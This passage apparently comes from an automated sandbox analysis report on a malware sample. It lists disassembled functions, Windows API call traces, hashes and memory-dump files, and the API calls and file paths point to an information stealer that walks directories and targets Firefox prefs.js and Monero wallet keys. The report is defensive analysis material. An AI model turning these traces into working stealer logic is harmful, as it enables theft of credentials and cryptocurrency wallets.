                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: cf1cf5096f68780258c5f8ca6589b02e4cab7be447e41d53fb810c43611e1d2c
                        • Instruction ID: 9de8a0fe205639e2750aced51f12e3741b33abfa63ad5e268555f05f6ca3ea06
                        • Opcode Fuzzy Hash: cf1cf5096f68780258c5f8ca6589b02e4cab7be447e41d53fb810c43611e1d2c
                        • Instruction Fuzzy Hash: 0AB131719001089BDB64FF64DCA6BEEB379AFD5300F4085A9A40A97191EF346B49CFD2
                        Function 009916D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009B510C,?,?,?,009B51B4,?,?,00000000,?,00000000), ref: 00991923
                        • StrCmpCA.SHLWAPI(?,009B525C), ref: 00991973
                        • StrCmpCA.SHLWAPI(?,009B5304), ref: 00991989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00991D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00991DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00991E20
                        • FindClose.KERNEL32(000000FF), ref: 00991E32
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: 745a392a768de646a11c25f1f446787c400dae65a8f91544e4fe09977665fe46
                        • Instruction ID: 39db1fc0327411d2c855510485e7e4082193aac6e3c7a29a4a3a0fc2d4c79723
                        • Opcode Fuzzy Hash: 745a392a768de646a11c25f1f446787c400dae65a8f91544e4fe09977665fe46
                        • Instruction Fuzzy Hash: 1512FA719101189BDB99FB64DC96BEE7378AF95300F4045A9B10B62091EF346F89CFE2
                        Function 0099DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,009B0C2E), ref: 0099DE5E
                        • StrCmpCA.SHLWAPI(?,009B14C8), ref: 0099DEAE
                        • StrCmpCA.SHLWAPI(?,009B14CC), ref: 0099DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0099E3E0
                        • FindClose.KERNEL32(000000FF), ref: 0099E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: 75865d342359691019893774ce14f4eb4fb435ad6a2a5eb0163a7dd31470e158
                        • Instruction ID: 8ac3ee6e4f728d3752b63718ccb524e3132827253972b78b2842790e14074fb7
                        • Opcode Fuzzy Hash: 75865d342359691019893774ce14f4eb4fb435ad6a2a5eb0163a7dd31470e158
                        • Instruction Fuzzy Hash: 9EF19C719141189BDB59EB64CC95FEE7338BF95300F8041D9A40B62091EF346F8ACFA6
                        Function 00D72B85 Relevance: 14.1, Strings: 10, Instructions: 1624COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: D9$^o6;$_X>$d($m5}$tY/~$tY/~$wow$|o{$s{[
                        • API String ID: 0-606133165
                        • Opcode ID: 50b4d92acbe2a1f232b326b9021dd5ccfb2afc87cbac1eb34838fd2a411e3240
                        • Instruction ID: 15297215b5f73c7aed85b95195a11c236d6857ce7419da086418f227988391ef
                        • Opcode Fuzzy Hash: 50b4d92acbe2a1f232b326b9021dd5ccfb2afc87cbac1eb34838fd2a411e3240
                        • Instruction Fuzzy Hash: B0B21BF360C6009FE3046E2DEC8567AFBE9EF94320F1A493DEAC4C7744E97558058696
                        Function 0099DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009B14B0,009B0C2A), ref: 0099DAEB
                        • StrCmpCA.SHLWAPI(?,009B14B4), ref: 0099DB33
                        • StrCmpCA.SHLWAPI(?,009B14B8), ref: 0099DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0099DDCC
                        • FindClose.KERNEL32(000000FF), ref: 0099DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 05a93f94d07ec8baa687620d032f165d60e234f26f8ef65af8f1801ef98c8df0
                        • Instruction ID: bda622a05f5cf98fc3fd943611341e79a69a531427b44c5b22c5722721e6814b
                        • Opcode Fuzzy Hash: 05a93f94d07ec8baa687620d032f165d60e234f26f8ef65af8f1801ef98c8df0
                        • Instruction Fuzzy Hash: 999120729001049BCF54FBB4EC96AFE737DABC5300F408669B90A96191EF349B59CBD2
                        Function 00D5B65D Relevance: 12.9, Strings: 9, Instructions: 1623COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 'D}~$)<_$6b|{$@*$CIw$M}z$eDm~$kx}Z$6{
                        • API String ID: 0-816090900
                        • Opcode ID: 0eb286f357a7ed63d7f688ad8e8788cfaad8edb3dfe5909fe8b45ce35e2944e1
                        • Instruction ID: a71d8e120646cd52d1567225f2691f5f02afb643b9adfeb173460e3a7ed8779b
                        • Opcode Fuzzy Hash: 0eb286f357a7ed63d7f688ad8e8788cfaad8edb3dfe5909fe8b45ce35e2944e1
                        • Instruction Fuzzy Hash: 1FA229F360C2049FE3046E2DEC85A7AFBEAEBD4320F16463DE6C4C7744EA3558158696
                        Function 009A7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,009B05AF), ref: 009A7BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 009A7BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 009A7C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 009A7C62
                        • LocalFree.KERNEL32(00000000), ref: 009A7D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: fa13667d803e133043da61db046de0c2df117f514c6c54d7a9026b909ee166c3
                        • Instruction ID: 830b570ff91845546cbfc53ed8c5a0c5b64283dc05d0b3176406d7a9e1a1a6b3
                        • Opcode Fuzzy Hash: fa13667d803e133043da61db046de0c2df117f514c6c54d7a9026b909ee166c3
                        • Instruction Fuzzy Hash: E0414C71941218ABDB64DB94DC9ABEEB378FF85700F2041D9E40A63291DB742F85CFA1
                        Function 0099E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,009B0D73), ref: 0099E4A2
                        • StrCmpCA.SHLWAPI(?,009B14F8), ref: 0099E4F2
                        • StrCmpCA.SHLWAPI(?,009B14FC), ref: 0099E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0099EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: 6d9f909bdec8295ce094e03abe6431f0a58454c8af016a2c4c2ddf25637c7024
                        • Instruction ID: 1ba7fd50f6a45db3487b19c2f023b0db57210d7a24704e7637d0e703ab0d834d
                        • Opcode Fuzzy Hash: 6d9f909bdec8295ce094e03abe6431f0a58454c8af016a2c4c2ddf25637c7024
                        • Instruction Fuzzy Hash: 1E123B719101189BDB58FB64DDA6BEE7338AFD5300F4041A9B50BA2091EF346F49CBE2
                        Function 00D59C03 Relevance: 9.1, Strings: 6, Instructions: 1607COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ]s~$BJq$bfOo$q#_U$kOo$kOo
                        • API String ID: 0-1777902374
                        • Opcode ID: e96336ec7cee18c5f7f608c009aff45d41a4ce76074efd2d71d56fbaa1515429
                        • Instruction ID: f07cbf61d4941dcae53d314bf01201ad53ec10dbb5eec1ab6332dac8acc9c513
                        • Opcode Fuzzy Hash: e96336ec7cee18c5f7f608c009aff45d41a4ce76074efd2d71d56fbaa1515429
                        • Instruction Fuzzy Hash: 3FB2A3F360C6009FE3046E2DEC8567ABBE9EFD4720F1A893DE6C4C7744E93598058696
                        Function 00D6203A Relevance: 9.1, Strings: 6, Instructions: 1575COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 3uDw$5(wv$8THC$A1;~$G5[$].n
                        • API String ID: 0-3059217628
                        • Opcode ID: 5559d21dae2ad1119d0d0f8f2bc57c3b92561f9aa86011d764cfb8260c38089a
                        • Instruction ID: 7898289805e26edf0ce15989a2faa7a829bea541d32830f438a2a1e8b0a230d0
                        • Opcode Fuzzy Hash: 5559d21dae2ad1119d0d0f8f2bc57c3b92561f9aa86011d764cfb8260c38089a
                        • Instruction Fuzzy Hash: A1B207F3A0C604AFE3046E29EC8577ABBE9EF94320F16453DEAC4C7744EA3558058697
                        Function 00D65650 Relevance: 7.9, Strings: 5, Instructions: 1669COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
